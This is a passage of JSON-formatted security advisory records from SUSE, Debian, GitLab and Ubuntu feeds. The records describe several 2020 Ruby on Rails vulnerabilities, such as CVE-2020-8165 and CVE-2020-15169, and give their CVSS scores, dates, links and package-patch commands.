from the SUSE:SLE-15:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-1677=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-16T00:00:00", "type": "suse", "title": "Security update for rubygem-activesupport-5_1 (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2020-10-16T00:00:00", "id": "OPENSUSE-SU-2020:1677-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/WPUCZGLPYNOC5DJRAWVXJCNB6T6PEZ7Y/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T12:40:59", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n This update for rubygem-activesupport-5_1 fixes the following issues:\n\n - CVE-2020-8165: Fixed deserialization of untrusted data in MemCacheStore\n potentially resulting in remote code execution (bsc#1172186)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2020-1679=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-17T00:00:00", "type": "suse", "title": "Security update for rubygem-activesupport-5_1 (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2020-10-17T00:00:00", "id": "OPENSUSE-SU-2020:1679-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/MHEVZRPOIACSFO3NTKUZ2CDR6E4A6UMU/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T12:41:06", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n This update for rubygem-actionpack-5_1 fixes the following issues:\n\n - CVE-2020-8164: Possible Strong Parameters Bypass in ActionPack. There is\n a strong parameters bypass vector in ActionPack. (bsc#1172177)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2020-1536=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-09-26T00:00:00", "type": "suse", "title": "Security update for rubygem-actionpack-5_1 (important)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8164"], "modified": "2020-09-26T00:00:00", "id": "OPENSUSE-SU-2020:1536-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/PHHJOKTVBY6KIPAX5EYDAV5V4DOJKUXD/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-18T12:41:06", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n This update for rubygem-actionpack-5_1 fixes the following issues:\n\n - CVE-2020-8164: Possible Strong Parameters Bypass in ActionPack. There is\n a strong parameters bypass vector in ActionPack. (bsc#1172177)\n\n This update was imported from the SUSE:SLE-15:Update update project. This\n update was imported from the openSUSE:Leap:15.1:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Backports SLE-15-SP1:\n\n zypper in -t patch openSUSE-2020-1575=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-09-29T00:00:00", "type": "suse", "title": "Security update for rubygem-actionpack-5_1 (important)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8164"], "modified": "2020-09-29T00:00:00", "id": "OPENSUSE-SU-2020:1575-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/YHTPGMTLIHWW2HEZZYLTXZTKJJHRRRNO/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debiancve": [{"lastseen": "2023-06-06T15:00:52", "description": "In Action View before versions 5.2.4.4 and 6.0.3.3 there is a potential Cross-Site Scripting (XSS) vulnerability in Action View's translation helpers. Views that allow the user to control the default (not found) value of the `t` and `translate` helpers could be susceptible to XSS attacks. When an HTML-unsafe string is passed as the default for a missing translation key named html or ending in _html, the default string is incorrectly marked as HTML-safe and not escaped. This is patched in versions 6.0.3.3 and 5.2.4.4. A workaround without upgrading is proposed in the source advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-09-11T16:15:00", "type": "debiancve", "title": "CVE-2020-15169", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169"], "modified": "2020-09-11T16:15:00", "id": "DEBIANCVE:CVE-2020-15169", "href": "https://security-tracker.debian.org/tracker/CVE-2020-15169", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:00:52", "description": "A client side enforcement of server side security vulnerability exists in rails < 5.2.4.2 and rails < 6.0.3.1 ActiveStorage's S3 adapter that allows the Content-Length of a direct file upload to be modified by an end user bypassing upload limits.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-19T17:15:00", "type": "debiancve", "title": "CVE-2020-8162", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8162"], "modified": "2020-06-19T17:15:00", "id": "DEBIANCVE:CVE-2020-8162", "href": "https://security-tracker.debian.org/tracker/CVE-2020-8162", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:00:52", "description": "A deserialization of untrusted data vulnerability exists in rails < 5.2.4.3, rails < 6.0.3.1 which can allow an attacker to supply information can be inadvertently leaked fromStrong Parameters.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-19T17:15:00", "type": "debiancve", "title": "CVE-2020-8164", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8164"], "modified": "2020-06-19T17:15:00", "id": "DEBIANCVE:CVE-2020-8164", "href": "https://security-tracker.debian.org/tracker/CVE-2020-8164", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-06T15:00:52", "description": "A CSRF vulnerability exists in rails <= 6.0.3 rails-ujs module that could allow attackers to send CSRF tokens to wrong domains.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-06-19T18:15:00", "type": "debiancve", "title": "CVE-2020-8167", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8167"], "modified": "2020-06-19T18:15:00", "id": "DEBIANCVE:CVE-2020-8167", "href": "https://security-tracker.debian.org/tracker/CVE-2020-8167", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:00:52", "description": "A CSRF forgery vulnerability exists in rails < 5.2.5, rails < 6.0.4 that makes it possible for an attacker to, given a global CSRF token such as the one present in the authenticity_token meta tag, forge a per-form CSRF token.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2020-07-02T19:15:00", "type": "debiancve", "title": "CVE-2020-8166", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8166"], "modified": "2020-07-02T19:15:00", "id": "DEBIANCVE:CVE-2020-8166", "href": "https://security-tracker.debian.org/tracker/CVE-2020-8166", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:00:52", "description": "A deserialization of untrusted data vulnernerability exists in rails < 5.2.4.3, rails < 6.0.3.1 that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-19T18:15:00", "type": "debiancve", "title": "CVE-2020-8165", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2020-06-19T18:15:00", "id": "DEBIANCVE:CVE-2020-8165", "href": "https://security-tracker.debian.org/tracker/CVE-2020-8165", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gitlab": [{"lastseen": "2023-06-06T15:43:38", "description": "In Action View there is a potential Cross-Site Scripting (XSS) vulnerability in Action View's translation helpers. Views that allow the user to control the default (not found) value of the `t` and `translate` helpers could be susceptible to XSS attacks. When an HTML-unsafe string is passed as the default for a missing translation key named html or ending in `_html`, the default string is incorrectly marked as HTML-safe and not escaped.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-09-11T00:00:00", "type": "gitlab", "title": "Cross-site Scripting", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169"], "modified": "2020-09-11T00:00:00", "id": "GITLAB-44D0471EDAE82B4A88EFC08288B8346F", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/gem%2Factionview%2FCVE-2020-15169.yml/raw", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:44:58", "description": "A client side enforcement of server side security vulnerability exists in rails and rails ActiveStorage's S3 adapter that allows the Content-Length of a direct file upload to be modified by an end user bypassing upload limits.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-19T00:00:00", "type": "gitlab", "title": "Unrestricted Upload of File with Dangerous Type", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8162"], "modified": "2020-06-19T00:00:00", "id": "GITLAB-CBBA0EE50F90463CBE67EEFA523D3FCA", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/gem%2Factivestorage%2FCVE-2020-8162.yml/raw", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:43:40", "description": "A CSRF vulnerability exists in rails rails-ujs module that could allow attackers to send CSRF tokens to wrong domains.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-06-19T00:00:00", "type": "gitlab", "title": "Cross-Site Request Forgery (CSRF)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8167"], "modified": "2020-06-19T00:00:00", "id": "GITLAB-AB4789FCCC0432BF4300068B9CAB5AD9", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/gem%2Factionview%2FCVE-2020-8167.yml/raw", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:45:10", "description": "A deserialization of untrusted data vulnernerability exists in rails, rails that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-19T00:00:00", "type": "gitlab", "title": "Deserialization of Untrusted Data", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2020-06-19T00:00:00", "id": "GITLAB-EB2002D0248799FE42732BEF81E56297", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/gem%2Factivesupport%2FCVE-2020-8165.yml/raw", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-07-28T01:59:27", "description": "In Action View before versions 5.2.4.4 and 6.0.3.3 there is a potential\nCross-Site Scripting (XSS) vulnerability in Action View's translation\nhelpers. Views that allow the user to control the default (not found) value\nof the `t` and `translate` helpers could be susceptible to XSS attacks.\nWhen an HTML-unsafe string is passed as the default for a missing\ntranslation key named html or ending in _html, the default string is\nincorrectly marked as HTML-safe and not escaped. This is patched in\nversions 6.0.3.3 and 5.2.4.4. A workaround without upgrading is proposed in\nthe source advisory.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=970040>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-09-11T00:00:00", "type": "ubuntucve", "title": "CVE-2020-15169", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169"], "modified": "2020-09-11T00:00:00", "id": "UB:CVE-2020-15169", "href": "https://ubuntu.com/security/CVE-2020-15169", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-28T13:47:41", "description": "A client side enforcement of server side security vulnerability exists in\nrails < 5.2.4.2 and rails < 6.0.3.1 ActiveStorage's S3 adapter that allows\nthe Content-Length of a direct file upload to be modified by an end user\nbypassing upload limits.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-19T00:00:00", "type": "ubuntucve", "title": "CVE-2020-8162", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8162"], "modified": "2020-06-19T00:00:00", "id": "UB:CVE-2020-8162", "href": "https://ubuntu.com/security/CVE-2020-8162", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-28T13:47:40", "description": "A deserialization of untrusted data vulnernerability exists in rails <\n5.2.4.3, rails < 6.0.3.1 that can allow an attacker to unmarshal\nuser-provided objects in MemCacheStore and RedisCacheStore potentially\nresulting in an RCE.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-19T00:00:00", "type": "ubuntucve", "title": "CVE-2020-8165", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 